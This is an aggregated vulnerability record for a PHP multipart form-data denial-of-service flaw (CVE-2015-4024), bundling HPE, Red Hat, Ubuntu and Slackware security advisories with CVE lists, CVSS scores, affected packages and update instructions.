CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n\n CVE-2016-4539\n 9.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n\n CVE-2016-4540\n 9.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n\n CVE-2016-4541\n 9.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n\n CVE-2016-4542\n 9.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n\n CVE-2016-4543\n 9.8 CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n\n CVE-2016-5385\n 8.1 CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\n 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)\n\n CVE-2016-5387\n 8.1 CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\n 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)\n\n CVE-2016-5388\n 8.1 CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\n 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P)\n\n Information on CVSS is documented in\n HPE Customer Notice HPSN-2008-002 here:\n\nhttps://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c01345499\n\n* Hewlett Packard Enterprise thanks Tenable Network Security for working with\nTrend Micro\u0027s Zero Day Initiative (ZDI) for reporting CVE-2016-4395 and\nCVE-2016-4396 to security-alert@hpe.com\n\nRESOLUTION\n\nHPE has made the following software updates available to resolve the\nvulnerabilities for the impacted versions of System Management Homepage\n(SMH). \n\nPlease download and install HPE System Management Homepage (SMH) v7.6.0 from\nthe following locations: \n\n* \u003chttps://www.hpe.com/us/en/product-catalog/detail/pip.344313.html\u003e\n\nHISTORY\nVersion:1 (rev.1) - 26 October 2016 Initial release\n\nThird Party Security Patches: Third party security patches that are to be\ninstalled on systems running Hewlett Packard Enterprise (HPE) software\nproducts should be applied in accordance with the customer\u0027s patch management\npolicy. \n\nSupport: For issues about implementing the recommendations of this Security\nBulletin, contact normal HPE Services support channel. For other issues about\nthe content of this Security Bulletin, send e-mail to security-alert@hpe.com. \n\nReport: To report a potential security vulnerability for any HPE supported\nproduct:\n Web form: https://www.hpe.com/info/report-security-vulnerability\n Email: security-alert@hpe.com\n\nSubscribe: To initiate a subscription to receive future HPE Security Bulletin\nalerts via Email: http://www.hpe.com/support/Subscriber_Choice\n\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\navailable here: http://www.hpe.com/support/Security_Bulletin_Archive\n\nSoftware Product Category: The Software Product Category is represented in\nthe title by the two characters following HPSB. \n\n3C = 3COM\n3P = 3rd Party Software\nGN = HPE General Software\nHF = HPE Hardware and Firmware\nMU = Multi-Platform Software\nNS = NonStop Servers\nOV = OpenVMS\nPV = ProCurve\nST = Storage Software\nUX = HP-UX\n\nCopyright 2016 Hewlett Packard Enterprise\n\nHewlett Packard Enterprise shall not be liable for technical or editorial\nerrors or omissions contained herein. The information provided is provided\n\"as is\" without warranty of any kind. To the extent permitted by law, neither\nHP or its affiliates, subcontractors or suppliers will be liable for\nincidental,special or consequential damages including downtime cost; lost\nprofits; damages relating to the procurement of substitute products or\nservices; or damages for loss of data, or software restoration. The\ninformation in this document is subject to change without notice. Hewlett\nPackard Enterprise and the names of Hewlett Packard Enterprise products\nreferenced herein are trademarks of Hewlett Packard Enterprise in the United\nStates and other countries. Other product and company names mentioned herein\nmay be trademarks of their respective owners. Please note that the Management\nInterface cannot access data stored on tape media, so this vulnerability does\nnot allow for remote unauthorized disclosure of data stored on tape media or\nremote denial of service. \n\nReferences:\n\n - CVE-2016-5385 - PHP, HTTPoxy\n - CVE-2016-3074 - PHP\n - CVE-2013-7456 - PHP\n - CVE-2016-5093 - PHP\n - CVE-2016-5094 - PHP\n - CVE-2016-5096 - PHP\n - CVE-2016-5766 - PHP\n - CVE-2016-5767 - PHP\n - CVE-2016-5768 - PHP\n - CVE-2016-5769 - PHP\n - CVE-2016-5770 - PHP\n - CVE-2016-5771 - PHP\n - CVE-2016-5772 - PHP\n - CVE-2016-5773 - PHP\n - CVE-2016-6207 - GD Graphics Library\n - CVE-2016-6289 - PHP\n - CVE-2016-6290 - PHP\n - CVE-2016-6291 - PHP\n - CVE-2016-6292 - PHP\n - CVE-2016-6293 - PHP\n - CVE-2016-6294 - PHP\n - CVE-2016-6295 - PHP\n - CVE-2016-6296 - PHP\n - CVE-2016-6297 - PHP\n - CVE-2016-5399 - PHP\n\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed",
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VAR-201506-0266
Vulnerability from variot - Updated: 2026-04-10 22:24Algorithmic complexity vulnerability in the multipart_buffer_headers function in main/rfc1867.c in PHP before 5.4.41, 5.5.x before 5.5.25, and 5.6.x before 5.6.9 allows remote attackers to cause a denial of service (CPU consumption) via crafted form data that triggers an improper order-of-growth outcome. PHP is prone to a remote denial-of-service vulnerability. Successful exploitation of the issue will cause excessive CPU resource consumption, resulting in a denial-of-service condition. PHP (PHP: Hypertext Preprocessor, PHP: Hypertext Preprocessor) is an open source general-purpose computer scripting language jointly maintained by the PHP Group and the open source community. The language is mainly used for Web development and supports a variety of databases and operating systems. An algorithmic complexity vulnerability exists in the 'multipart_buffer_headers' function in PHP's main/rfc1867.c file. The following versions are affected: PHP prior to 5.4.41, 5.5.x prior to 5.5.25, and 5.6.x prior to 5.6.9. 6) - i386, x86_64
- (CVE-2014-9709)
A double free flaw was found in zend_ts_hash_graceful_destroy() function in the PHP ZTS module. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Important: php security and bug fix update Advisory ID: RHSA-2015:1135-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2015-1135.html Issue date: 2015-06-23 CVE Names: CVE-2014-8142 CVE-2014-9652 CVE-2014-9705 CVE-2014-9709 CVE-2015-0231 CVE-2015-0232 CVE-2015-0273 CVE-2015-2301 CVE-2015-2348 CVE-2015-2783 CVE-2015-2787 CVE-2015-3307 CVE-2015-3329 CVE-2015-3330 CVE-2015-3411 CVE-2015-3412 CVE-2015-4021 CVE-2015-4022 CVE-2015-4024 CVE-2015-4025 CVE-2015-4026 CVE-2015-4147 CVE-2015-4148 CVE-2015-4598 CVE-2015-4599 CVE-2015-4600 CVE-2015-4601 CVE-2015-4602 CVE-2015-4603 CVE-2015-4604 CVE-2015-4605 =====================================================================
- Summary:
Updated php packages that fix multiple security issues and several bugs are now available for Red Hat Enterprise Linux 7.
Red Hat Product Security has rated this update as having Important security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Server (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64
- Description:
PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Server.
A flaw was found in the way the PHP module for the Apache httpd web server handled pipelined requests. A remote attacker could use this flaw to trigger the execution of a PHP script in a deinitialized interpreter, causing it to crash or, possibly, execute arbitrary code. (CVE-2015-3330)
A flaw was found in the way PHP parsed multipart HTTP POST requests. A specially crafted request could cause PHP to use an excessive amount of CPU time. (CVE-2015-4024)
An uninitialized pointer use flaw was found in PHP's Exif extension. A specially crafted JPEG or TIFF file could cause a PHP application using the exif_read_data() function to crash or, possibly, execute arbitrary code with the privileges of the user running that PHP application. (CVE-2015-0232)
An integer overflow flaw leading to a heap-based buffer overflow was found in the way PHP's FTP extension parsed file listing FTP server responses. A malicious FTP server could use this flaw to cause a PHP application to crash or, possibly, execute arbitrary code. (CVE-2015-4022)
Multiple flaws were discovered in the way PHP performed object unserialization. Specially crafted input processed by the unserialize() function could cause a PHP application to crash or, possibly, execute arbitrary code. (CVE-2014-8142, CVE-2015-0231, CVE-2015-0273, CVE-2015-2787, CVE-2015-4147, CVE-2015-4148, CVE-2015-4599, CVE-2015-4600, CVE-2015-4601, CVE-2015-4602, CVE-2015-4603)
It was found that certain PHP functions did not properly handle file names containing a NULL character. A remote attacker could possibly use this flaw to make a PHP script access unexpected files and bypass intended file system access restrictions. (CVE-2015-2348, CVE-2015-4025, CVE-2015-4026, CVE-2015-3411, CVE-2015-3412, CVE-2015-4598)
Multiple flaws were found in the way the way PHP's Phar extension parsed Phar archives. A specially crafted archive could cause PHP to crash or, possibly, execute arbitrary code when opened. (CVE-2015-2301, CVE-2015-2783, CVE-2015-3307, CVE-2015-3329, CVE-2015-4021)
Multiple flaws were found in PHP's File Information (fileinfo) extension. A remote attacker could cause a PHP application to crash if it used fileinfo to identify type of attacker supplied files. (CVE-2014-9652, CVE-2015-4604, CVE-2015-4605)
A heap buffer overflow flaw was found in the enchant_broker_request_dict() function of PHP's enchant extension. An attacker able to make a PHP application enchant dictionaries could possibly cause it to crash. (CVE-2014-9705)
A buffer over-read flaw was found in the GD library used by the PHP gd extension. A specially crafted GIF file could cause a PHP application using the imagecreatefromgif() function to crash. (CVE-2014-9709)
This update also fixes the following bugs:
-
The libgmp library in some cases terminated unexpectedly with a segmentation fault when being used with other libraries that use the GMP memory management. With this update, PHP no longer changes libgmp memory allocators, which prevents the described crash from occurring. (BZ#1212305)
-
When using the Open Database Connectivity (ODBC) API, the PHP process in some cases terminated unexpectedly with a segmentation fault. The underlying code has been adjusted to prevent this crash. (BZ#1212299)
-
Previously, running PHP on a big-endian system sometimes led to memory corruption in the fileinfo module. This update adjusts the behavior of the PHP pointer so that it can be freed without causing memory corruption. (BZ#1212298)
All php users are advised to upgrade to these updated packages, which contain backported patches to correct these issues. After installing the updated packages, the httpd daemon must be restarted for the update to take effect.
- Solution:
Before applying this update, make sure all previously released errata relevant to your system have been applied.
For details on how to apply this update, refer to:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1175718 - CVE-2014-8142 php: use after free vulnerability in unserialize() 1185397 - CVE-2015-0231 php: use after free vulnerability in unserialize() (incomplete fix of CVE-2014-8142) 1185472 - CVE-2015-0232 php: Free called on unitialized pointer in exif.c 1188599 - CVE-2014-9652 file: out of bounds read in mconvert() 1188639 - CVE-2014-9709 gd: buffer read overflow in gd_gif_in.c 1194730 - CVE-2015-0273 php: use after free vulnerability in unserialize() with DateTimeZone 1194737 - CVE-2014-9705 php: heap buffer overflow in enchant_broker_request_dict() 1194747 - CVE-2015-2301 php: use after free in phar_object.c 1204868 - CVE-2015-4147 php: SoapClient's __call() type confusion through unserialize() 1207676 - CVE-2015-2787 php: use-after-free vulnerability in the process_nested_data function in ext/standard/var_unserializer.re 1207682 - CVE-2015-2348 php: move_uploaded_file() NUL byte injection in file name 1213394 - CVE-2015-3330 php: pipelined request executed in deinitialized interpreter under httpd 2.4 1213407 - CVE-2015-3411 php: missing null byte checks for paths in various PHP extensions 1213442 - CVE-2015-4604 CVE-2015-4605 php: denial of service when processing a crafted file with Fileinfo 1213446 - CVE-2015-2783 php: buffer over-read in Phar metadata parsing 1213449 - CVE-2015-3329 php: buffer overflow in phar_set_inode() 1222485 - CVE-2015-4024 php: multipart/form-data request paring CPU usage DoS 1222538 - CVE-2015-4599 CVE-2015-4600 CVE-2015-4601 php: type confusion issue in unserialize() with various SOAP methods 1223408 - CVE-2015-4025 php: CVE-2006-7243 regressions in 5.4+ 1223412 - CVE-2015-4022 php: integer overflow leading to heap overflow when reading FTP file listing 1223422 - CVE-2015-4026 php: pcntl_exec() accepts paths with NUL character 1223425 - CVE-2015-4021 php: memory corruption in phar_parse_tarfile caused by empty entry file name 1223441 - CVE-2015-3307 php: invalid pointer free() in phar_tar_process_metadata() 1226916 - CVE-2015-4148 php: SoapClient's do_soap_call() type confusion after unserialize() 1232823 - CVE-2015-3412 php: missing null byte checks for paths in various PHP extensions 1232897 - CVE-2015-4598 php: missing null byte checks for paths in DOM and GD extensions 1232918 - CVE-2015-4603 php: exception::getTraceAsString type confusion issue after unserialize 1232923 - CVE-2015-4602 php: Incomplete Class unserialization type confusion
- Package List:
Red Hat Enterprise Linux Client Optional (v. 7):
Source: php-5.4.16-36.el7_1.src.rpm
x86_64: php-5.4.16-36.el7_1.x86_64.rpm php-bcmath-5.4.16-36.el7_1.x86_64.rpm php-cli-5.4.16-36.el7_1.x86_64.rpm php-common-5.4.16-36.el7_1.x86_64.rpm php-dba-5.4.16-36.el7_1.x86_64.rpm php-debuginfo-5.4.16-36.el7_1.x86_64.rpm php-devel-5.4.16-36.el7_1.x86_64.rpm php-embedded-5.4.16-36.el7_1.x86_64.rpm php-enchant-5.4.16-36.el7_1.x86_64.rpm php-fpm-5.4.16-36.el7_1.x86_64.rpm php-gd-5.4.16-36.el7_1.x86_64.rpm php-intl-5.4.16-36.el7_1.x86_64.rpm php-ldap-5.4.16-36.el7_1.x86_64.rpm php-mbstring-5.4.16-36.el7_1.x86_64.rpm php-mysql-5.4.16-36.el7_1.x86_64.rpm php-mysqlnd-5.4.16-36.el7_1.x86_64.rpm php-odbc-5.4.16-36.el7_1.x86_64.rpm php-pdo-5.4.16-36.el7_1.x86_64.rpm php-pgsql-5.4.16-36.el7_1.x86_64.rpm php-process-5.4.16-36.el7_1.x86_64.rpm php-pspell-5.4.16-36.el7_1.x86_64.rpm php-recode-5.4.16-36.el7_1.x86_64.rpm php-snmp-5.4.16-36.el7_1.x86_64.rpm php-soap-5.4.16-36.el7_1.x86_64.rpm php-xml-5.4.16-36.el7_1.x86_64.rpm php-xmlrpc-5.4.16-36.el7_1.x86_64.rpm
Red Hat Enterprise Linux ComputeNode Optional (v. 7):
Source: php-5.4.16-36.el7_1.src.rpm
x86_64: php-5.4.16-36.el7_1.x86_64.rpm php-bcmath-5.4.16-36.el7_1.x86_64.rpm php-cli-5.4.16-36.el7_1.x86_64.rpm php-common-5.4.16-36.el7_1.x86_64.rpm php-dba-5.4.16-36.el7_1.x86_64.rpm php-debuginfo-5.4.16-36.el7_1.x86_64.rpm php-devel-5.4.16-36.el7_1.x86_64.rpm php-embedded-5.4.16-36.el7_1.x86_64.rpm php-enchant-5.4.16-36.el7_1.x86_64.rpm php-fpm-5.4.16-36.el7_1.x86_64.rpm php-gd-5.4.16-36.el7_1.x86_64.rpm php-intl-5.4.16-36.el7_1.x86_64.rpm php-ldap-5.4.16-36.el7_1.x86_64.rpm php-mbstring-5.4.16-36.el7_1.x86_64.rpm php-mysql-5.4.16-36.el7_1.x86_64.rpm php-mysqlnd-5.4.16-36.el7_1.x86_64.rpm php-odbc-5.4.16-36.el7_1.x86_64.rpm php-pdo-5.4.16-36.el7_1.x86_64.rpm php-pgsql-5.4.16-36.el7_1.x86_64.rpm php-process-5.4.16-36.el7_1.x86_64.rpm php-pspell-5.4.16-36.el7_1.x86_64.rpm php-recode-5.4.16-36.el7_1.x86_64.rpm php-snmp-5.4.16-36.el7_1.x86_64.rpm php-soap-5.4.16-36.el7_1.x86_64.rpm php-xml-5.4.16-36.el7_1.x86_64.rpm php-xmlrpc-5.4.16-36.el7_1.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: php-5.4.16-36.el7_1.src.rpm
ppc64: php-5.4.16-36.el7_1.ppc64.rpm php-cli-5.4.16-36.el7_1.ppc64.rpm php-common-5.4.16-36.el7_1.ppc64.rpm php-debuginfo-5.4.16-36.el7_1.ppc64.rpm php-gd-5.4.16-36.el7_1.ppc64.rpm php-ldap-5.4.16-36.el7_1.ppc64.rpm php-mysql-5.4.16-36.el7_1.ppc64.rpm php-odbc-5.4.16-36.el7_1.ppc64.rpm php-pdo-5.4.16-36.el7_1.ppc64.rpm php-pgsql-5.4.16-36.el7_1.ppc64.rpm php-process-5.4.16-36.el7_1.ppc64.rpm php-recode-5.4.16-36.el7_1.ppc64.rpm php-soap-5.4.16-36.el7_1.ppc64.rpm php-xml-5.4.16-36.el7_1.ppc64.rpm php-xmlrpc-5.4.16-36.el7_1.ppc64.rpm
s390x: php-5.4.16-36.el7_1.s390x.rpm php-cli-5.4.16-36.el7_1.s390x.rpm php-common-5.4.16-36.el7_1.s390x.rpm php-debuginfo-5.4.16-36.el7_1.s390x.rpm php-gd-5.4.16-36.el7_1.s390x.rpm php-ldap-5.4.16-36.el7_1.s390x.rpm php-mysql-5.4.16-36.el7_1.s390x.rpm php-odbc-5.4.16-36.el7_1.s390x.rpm php-pdo-5.4.16-36.el7_1.s390x.rpm php-pgsql-5.4.16-36.el7_1.s390x.rpm php-process-5.4.16-36.el7_1.s390x.rpm php-recode-5.4.16-36.el7_1.s390x.rpm php-soap-5.4.16-36.el7_1.s390x.rpm php-xml-5.4.16-36.el7_1.s390x.rpm php-xmlrpc-5.4.16-36.el7_1.s390x.rpm
x86_64: php-5.4.16-36.el7_1.x86_64.rpm php-cli-5.4.16-36.el7_1.x86_64.rpm php-common-5.4.16-36.el7_1.x86_64.rpm php-debuginfo-5.4.16-36.el7_1.x86_64.rpm php-gd-5.4.16-36.el7_1.x86_64.rpm php-ldap-5.4.16-36.el7_1.x86_64.rpm php-mysql-5.4.16-36.el7_1.x86_64.rpm php-odbc-5.4.16-36.el7_1.x86_64.rpm php-pdo-5.4.16-36.el7_1.x86_64.rpm php-pgsql-5.4.16-36.el7_1.x86_64.rpm php-process-5.4.16-36.el7_1.x86_64.rpm php-recode-5.4.16-36.el7_1.x86_64.rpm php-soap-5.4.16-36.el7_1.x86_64.rpm php-xml-5.4.16-36.el7_1.x86_64.rpm php-xmlrpc-5.4.16-36.el7_1.x86_64.rpm
Red Hat Enterprise Linux Server (v. 7):
Source: php-5.4.16-36.ael7b_1.src.rpm
ppc64le: php-5.4.16-36.ael7b_1.ppc64le.rpm php-cli-5.4.16-36.ael7b_1.ppc64le.rpm php-common-5.4.16-36.ael7b_1.ppc64le.rpm php-debuginfo-5.4.16-36.ael7b_1.ppc64le.rpm php-gd-5.4.16-36.ael7b_1.ppc64le.rpm php-ldap-5.4.16-36.ael7b_1.ppc64le.rpm php-mysql-5.4.16-36.ael7b_1.ppc64le.rpm php-odbc-5.4.16-36.ael7b_1.ppc64le.rpm php-pdo-5.4.16-36.ael7b_1.ppc64le.rpm php-pgsql-5.4.16-36.ael7b_1.ppc64le.rpm php-process-5.4.16-36.ael7b_1.ppc64le.rpm php-recode-5.4.16-36.ael7b_1.ppc64le.rpm php-soap-5.4.16-36.ael7b_1.ppc64le.rpm php-xml-5.4.16-36.ael7b_1.ppc64le.rpm php-xmlrpc-5.4.16-36.ael7b_1.ppc64le.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
ppc64: php-bcmath-5.4.16-36.el7_1.ppc64.rpm php-dba-5.4.16-36.el7_1.ppc64.rpm php-debuginfo-5.4.16-36.el7_1.ppc64.rpm php-devel-5.4.16-36.el7_1.ppc64.rpm php-embedded-5.4.16-36.el7_1.ppc64.rpm php-enchant-5.4.16-36.el7_1.ppc64.rpm php-fpm-5.4.16-36.el7_1.ppc64.rpm php-intl-5.4.16-36.el7_1.ppc64.rpm php-mbstring-5.4.16-36.el7_1.ppc64.rpm php-mysqlnd-5.4.16-36.el7_1.ppc64.rpm php-pspell-5.4.16-36.el7_1.ppc64.rpm php-snmp-5.4.16-36.el7_1.ppc64.rpm
s390x: php-bcmath-5.4.16-36.el7_1.s390x.rpm php-dba-5.4.16-36.el7_1.s390x.rpm php-debuginfo-5.4.16-36.el7_1.s390x.rpm php-devel-5.4.16-36.el7_1.s390x.rpm php-embedded-5.4.16-36.el7_1.s390x.rpm php-enchant-5.4.16-36.el7_1.s390x.rpm php-fpm-5.4.16-36.el7_1.s390x.rpm php-intl-5.4.16-36.el7_1.s390x.rpm php-mbstring-5.4.16-36.el7_1.s390x.rpm php-mysqlnd-5.4.16-36.el7_1.s390x.rpm php-pspell-5.4.16-36.el7_1.s390x.rpm php-snmp-5.4.16-36.el7_1.s390x.rpm
x86_64: php-bcmath-5.4.16-36.el7_1.x86_64.rpm php-dba-5.4.16-36.el7_1.x86_64.rpm php-debuginfo-5.4.16-36.el7_1.x86_64.rpm php-devel-5.4.16-36.el7_1.x86_64.rpm php-embedded-5.4.16-36.el7_1.x86_64.rpm php-enchant-5.4.16-36.el7_1.x86_64.rpm php-fpm-5.4.16-36.el7_1.x86_64.rpm php-intl-5.4.16-36.el7_1.x86_64.rpm php-mbstring-5.4.16-36.el7_1.x86_64.rpm php-mysqlnd-5.4.16-36.el7_1.x86_64.rpm php-pspell-5.4.16-36.el7_1.x86_64.rpm php-snmp-5.4.16-36.el7_1.x86_64.rpm
Red Hat Enterprise Linux Server Optional (v. 7):
ppc64le: php-bcmath-5.4.16-36.ael7b_1.ppc64le.rpm php-dba-5.4.16-36.ael7b_1.ppc64le.rpm php-debuginfo-5.4.16-36.ael7b_1.ppc64le.rpm php-devel-5.4.16-36.ael7b_1.ppc64le.rpm php-embedded-5.4.16-36.ael7b_1.ppc64le.rpm php-enchant-5.4.16-36.ael7b_1.ppc64le.rpm php-fpm-5.4.16-36.ael7b_1.ppc64le.rpm php-intl-5.4.16-36.ael7b_1.ppc64le.rpm php-mbstring-5.4.16-36.ael7b_1.ppc64le.rpm php-mysqlnd-5.4.16-36.ael7b_1.ppc64le.rpm php-pspell-5.4.16-36.ael7b_1.ppc64le.rpm php-snmp-5.4.16-36.ael7b_1.ppc64le.rpm
Red Hat Enterprise Linux Workstation (v. 7):
Source: php-5.4.16-36.el7_1.src.rpm
x86_64: php-5.4.16-36.el7_1.x86_64.rpm php-cli-5.4.16-36.el7_1.x86_64.rpm php-common-5.4.16-36.el7_1.x86_64.rpm php-debuginfo-5.4.16-36.el7_1.x86_64.rpm php-gd-5.4.16-36.el7_1.x86_64.rpm php-ldap-5.4.16-36.el7_1.x86_64.rpm php-mysql-5.4.16-36.el7_1.x86_64.rpm php-odbc-5.4.16-36.el7_1.x86_64.rpm php-pdo-5.4.16-36.el7_1.x86_64.rpm php-pgsql-5.4.16-36.el7_1.x86_64.rpm php-process-5.4.16-36.el7_1.x86_64.rpm php-recode-5.4.16-36.el7_1.x86_64.rpm php-soap-5.4.16-36.el7_1.x86_64.rpm php-xml-5.4.16-36.el7_1.x86_64.rpm php-xmlrpc-5.4.16-36.el7_1.x86_64.rpm
Red Hat Enterprise Linux Workstation Optional (v. 7):
x86_64: php-bcmath-5.4.16-36.el7_1.x86_64.rpm php-dba-5.4.16-36.el7_1.x86_64.rpm php-debuginfo-5.4.16-36.el7_1.x86_64.rpm php-devel-5.4.16-36.el7_1.x86_64.rpm php-embedded-5.4.16-36.el7_1.x86_64.rpm php-enchant-5.4.16-36.el7_1.x86_64.rpm php-fpm-5.4.16-36.el7_1.x86_64.rpm php-intl-5.4.16-36.el7_1.x86_64.rpm php-mbstring-5.4.16-36.el7_1.x86_64.rpm php-mysqlnd-5.4.16-36.el7_1.x86_64.rpm php-pspell-5.4.16-36.el7_1.x86_64.rpm php-snmp-5.4.16-36.el7_1.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2014-8142 https://access.redhat.com/security/cve/CVE-2014-9652 https://access.redhat.com/security/cve/CVE-2014-9705 https://access.redhat.com/security/cve/CVE-2014-9709 https://access.redhat.com/security/cve/CVE-2015-0231 https://access.redhat.com/security/cve/CVE-2015-0232 https://access.redhat.com/security/cve/CVE-2015-0273 https://access.redhat.com/security/cve/CVE-2015-2301 https://access.redhat.com/security/cve/CVE-2015-2348 https://access.redhat.com/security/cve/CVE-2015-2783 https://access.redhat.com/security/cve/CVE-2015-2787 https://access.redhat.com/security/cve/CVE-2015-3307 https://access.redhat.com/security/cve/CVE-2015-3329 https://access.redhat.com/security/cve/CVE-2015-3330 https://access.redhat.com/security/cve/CVE-2015-3411 https://access.redhat.com/security/cve/CVE-2015-3412 https://access.redhat.com/security/cve/CVE-2015-4021 https://access.redhat.com/security/cve/CVE-2015-4022 https://access.redhat.com/security/cve/CVE-2015-4024 https://access.redhat.com/security/cve/CVE-2015-4025 https://access.redhat.com/security/cve/CVE-2015-4026 https://access.redhat.com/security/cve/CVE-2015-4147 https://access.redhat.com/security/cve/CVE-2015-4148 https://access.redhat.com/security/cve/CVE-2015-4598 https://access.redhat.com/security/cve/CVE-2015-4599 https://access.redhat.com/security/cve/CVE-2015-4600 https://access.redhat.com/security/cve/CVE-2015-4601 https://access.redhat.com/security/cve/CVE-2015-4602 https://access.redhat.com/security/cve/CVE-2015-4603 https://access.redhat.com/security/cve/CVE-2015-4604 https://access.redhat.com/security/cve/CVE-2015-4605 https://access.redhat.com/security/updates/classification/#important
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
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-- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . ============================================================================ Ubuntu Security Notice USN-2658-1 July 06, 2015
php5 vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 15.04
- Ubuntu 14.10
- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
Summary:
Several security issues were fixed in PHP.
Software Description: - php5: HTML-embedded scripting language interpreter
Details:
Neal Poole and Tomas Hoger discovered that PHP incorrectly handled NULL bytes in file paths. (CVE-2015-3411, CVE-2015-3412, CVE-2015-4025, CVE-2015-4026, CVE-2015-4598)
Emmanuel Law discovered that the PHP phar extension incorrectly handled filenames starting with a NULL byte. (CVE-2015-4021)
Max Spelsberg discovered that PHP incorrectly handled the LIST command when connecting to remote FTP servers. (CVE-2015-4022, CVE-2015-4643)
Shusheng Liu discovered that PHP incorrectly handled certain malformed form data. (CVE-2015-4024)
Andrea Palazzo discovered that the PHP Soap client incorrectly validated data types. (CVE-2015-4147)
Andrea Palazzo discovered that the PHP Soap client incorrectly validated that the uri property is a string. A remote attacker could possibly use these issues to obtain sensitive information or cause a denial of service. This issue only affected Ubuntu 15.04. (CVE-2015-4644)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 15.04: libapache2-mod-php5 5.6.4+dfsg-4ubuntu6.2 php5-cgi 5.6.4+dfsg-4ubuntu6.2 php5-cli 5.6.4+dfsg-4ubuntu6.2 php5-fpm 5.6.4+dfsg-4ubuntu6.2
Ubuntu 14.10: libapache2-mod-php5 5.5.12+dfsg-2ubuntu4.6 php5-cgi 5.5.12+dfsg-2ubuntu4.6 php5-cli 5.5.12+dfsg-2ubuntu4.6 php5-fpm 5.5.12+dfsg-2ubuntu4.6
Ubuntu 14.04 LTS: libapache2-mod-php5 5.5.9+dfsg-1ubuntu4.11 php5-cgi 5.5.9+dfsg-1ubuntu4.11 php5-cli 5.5.9+dfsg-1ubuntu4.11 php5-fpm 5.5.9+dfsg-1ubuntu4.11
Ubuntu 12.04 LTS: libapache2-mod-php5 5.3.10-1ubuntu3.19 php5-cgi 5.3.10-1ubuntu3.19 php5-cli 5.3.10-1ubuntu3.19 php5-fpm 5.3.10-1ubuntu3.19
In general, a standard system update will make all the necessary changes.
Here are the details from the Slackware 14.1 ChangeLog: +--------------------------+ patches/packages/php-5.4.41-i486-1_slack14.1.txz: Upgraded. This update fixes some bugs and security issues. For more information, see: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-7243 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2325 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2326 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4021 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4022 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4024 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4025 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4026 ( Security fix ) +--------------------------+
Where to find the new packages: +-----------------------------+
Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.
Updated package for Slackware 14.0: ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/php-5.4.41-i486-1_slack14.0.txz
Updated package for Slackware x86_64 14.0: ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/php-5.4.41-x86_64-1_slack14.0.txz
Updated package for Slackware 14.1: ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/php-5.4.41-i486-1_slack14.1.txz
Updated package for Slackware x86_64 14.1: ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/php-5.4.41-x86_64-1_slack14.1.txz
Updated package for Slackware -current: ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/php-5.6.9-i586-1.txz
Updated package for Slackware x86_64 -current: ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/php-5.6.9-x86_64-1.txz
